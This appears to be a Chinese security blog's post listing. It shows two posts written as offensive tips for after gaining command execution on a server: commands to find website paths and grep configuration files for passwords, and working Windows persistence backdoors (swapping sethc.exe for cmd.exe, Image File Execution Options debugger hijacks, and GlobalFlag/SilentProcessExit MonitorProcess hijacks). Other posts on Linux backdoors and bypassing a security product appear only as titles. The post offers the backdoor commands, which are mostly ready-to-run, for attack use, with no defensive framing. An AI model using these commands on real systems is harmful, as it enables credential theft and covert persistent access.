搜索网站文件路径小技巧

作者: knickers
时间: 2020-01-11
分类: 安全运维
评论

搜索网站文件路径小技巧

环境是当能执行单条命令的时候未找到网站路径怎么去找，比如有命令执行，或者xp_cmdshell执行的时候。

Linux下：

find / -name logo_11.png

linux搜索文件内容

grep -r "pass" ./

windows：

IIS:

type C:\WINDOWS\system32\inetsrv\MetaBase.xml | findstr "Path"

其他：
搜索文件位置/搜索conf内带password内容的文本

for /r E:\ %i in (*.jsp) do @echo %i
where /R E:\ *.jsp
find /  -name "*.conf" 2>&1 | xargs grep -s -i 'password' > xxoo.txt

使用GlobalFlags劫持任意进程镜像持久化/sethc.exe在不同版本后门应用整理

作者: knickers
时间: 2019-12-17
分类: 网络安全,权限维持
评论

使用GlobalFlags劫持任意进程镜像持久化/sethc.exe在不同版本后门应用整理

[toc]

windows 2k3

单条命令执行

windows 2003/xp
这种方式就比较普遍了
利用copy来替换sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\sethc2.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

windows 2008/win7

单条命令执行

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f

Jietu20191216-164505
或者还可以使用上面的功能。不过需要修改权限。
所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)

takeown /f c:\windows\system32\sethc.*   /a /r /d y
cacls  c:\windows\system32\sethc.*  /T /E /G administrators:F

-w806

多条命令执行

在看到近期一个表哥发的文章可以利用映像劫持的方式留shift后门，在5下shift后成功弹出了sethc，然后还可以在执行恶意文件
其中利用的方式

Shfit映像劫持后门新玩法

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1  /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

Jietu20191216-152933

Global Flags劫持任意exe镜像

上面的文章中提到了Globalflags，这个工具是包含在 Debugging Tools for Windows(WinDbg)下的。
本地可以利用winsdk_web.exe去安装。

-w588

点击应用后在打开notepad后

这里是利用gflags的监视进程把监视进程设置成cmd.exe,原理就是修改了三个注册表内容，添加了MonitorProcess的键值。

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v ReportingMode /t REG_DWORD /d 1  /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
https://payloads.cn/2019/1205/shfit-image-hijacks-backdoor-new-gameplay.html
https://www.anquanke.com/post/id/151425

WUSA.exe和COM越权复制文件绕过某安全助手添加启动项

作者: knickers
时间: 2019-12-11
分类: 网络安全,权限维持
评论

Linux后门总结-内容

作者: knickers
时间: 2019-12-05
分类: 网络安全,权限维持
评论

Linux后门总结

作者: knickers
时间: 2019-12-02
分类: 网络安全,权限维持
评论

谢谢wing大佬给的思路

-w1014

细节过几天在发出来。